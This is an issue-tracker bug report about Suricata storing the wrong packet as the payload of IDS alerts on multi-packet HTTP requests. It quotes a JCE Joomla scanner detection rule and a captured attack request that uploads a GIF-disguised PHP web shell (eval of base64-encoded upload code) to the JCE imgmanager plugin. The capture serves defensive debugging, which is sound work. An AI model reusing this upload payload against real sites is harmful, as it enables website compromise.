Project

General

Profile

Actions

Bug #810

closed

Alerts on http traffic storing the wrong packet as the IDS event payload

Added by Kevin Branch over 11 years ago. Updated almost 4 years ago.

Status:
Closed
Priority:
Normal
Assignee:
Target version:
Affected Versions:
Effort:
Difficulty:
Label:

Description

At multiple sites I am running Suricata 1.4.1 on 64 bit Ubuntu 12.04 and CentOS 6 with PF_RING, and I am frequently running into this problem.
It appears that when an HTTP request spanning multiple packets (like an HTTP POST with the POST data spilling over into a second packet), triggers an IDS alert, that frequently the wrong packet gets stuffed into the payload field of the unified2 file for that event, such that looking at the stored event I cannot find the substring that the firing rule was looking for.

For example, I just has this rule fire at two different sites running Suricata (versions 1.4 and 1.4.1).

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET CURRENT_EVENTS JCE Joomla Scanner"; flow:established,to_server; content:"User-Agent|3a| BOT/0.1 (BOT for JCE)"; http_header; classtype:web-application-attack; sid:2016032; rev:1;)

In both cases an HTTP POST spread across two packets is involved. The substring matched by the rule is in the 1st packet, but only the second packet is recorded as the payload.
When a multi-packet HTTP request is made, I'd personally like to see the whole thing merged together into a single data payload to be inserted into the NIDS event. Or if that isn't reasonable, at least stash the same packet that actually matched the rule.

T 95.173.183.22:2472 -> 172.21.1.143:80 [A]

POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743 HTTP/1.1.
Host: www.scriptsource.org.
User-Agent: BOT/0.1 (BOT for JCE).
Content-Type: multipart/form-data; boundary=---------------------------41184676334.
Accept-Language: en-us,en;q=0.5.
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7.
Cookie: 6bc427c8a7981f4fe1f5ac65c1246b5f=9d09f693c63c1988a9f8a564e0da7743; jce_imgmanager_dir=%2F; __utma=216871948.2116932307.1317632284.1317632284.1317632284.1; __utmb=216871948.1.10.1317632284; __utmc=216871948; __utmz=216871948.1317632284.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none).
Connection: Close.
Proxy-Connection: close.
Content-Length: 1337.
.
.
.
-----------------------------41184676334.
Content-Disposition: form-data; name="upload-dir".
.
/.
-----------------------------41184676334.
Content-Disposition: form-data; name="Filedata"; filename="".
Content-Type: application/octet-stream.
.
.
-----------------------------41184676334.
Content-Disposition: form-data; name="upload-overwrite".
.
0.
-----------------------------41184676334.
Content-Disposition: form-data; name="Filedata"; filename="mua.gif".
Content-Type: image/gif.
.
GIF89a1
<?php eval("?>".base64_decode("PGh0bWw+IENvZGVkIEJ5IE11YSAmIEtlcmVzdGVjaTxicj4NCjw/IA0KLyogQ29kZWQgQnkgTXVhICYgS2VyZXN0ZWNpICovDQplY2hvICc

T 95.173.183.22:2472 - > 172.21.1.143:80 [AP]
8Zm9ybSBhY3Rpb249IiIgbWV0aG9kPSJwb3N0IiBlbmN0eXBlPSJtdWx0aXBhcnQvZm9ybS1kYXRhIiBuYW1lPSJ1cGxvYWRlciIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7DQppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+dXN0YSB1cGxvYWQgYmFzYXJpbGk8L2I+PGJyPjxicj4nOyB9DQp9DQo/PjwvaHRtbD4=")); ?>.
-----------------------------41184676334.
0day.
-----------------------------41184676334.
Content-Disposition: form-data; name="action".
.
upload.
-----------------------------41184676334--.
.
.
.


Files

exe-as-text.cap (5.67 KB) exe-as-text.cap pcap of conversation Kevin Branch, 07/01/2013 03:02 PM
text dump.txt (5.58 KB) text dump.txt text dump of conversation Kevin Branch, 07/01/2013 03:03 PM
alert debug.txt (28.9 KB) alert debug.txt Suricata alert debug log data about this event Kevin Branch, 07/01/2013 03:04 PM
Actions

Also available in: Atom PDF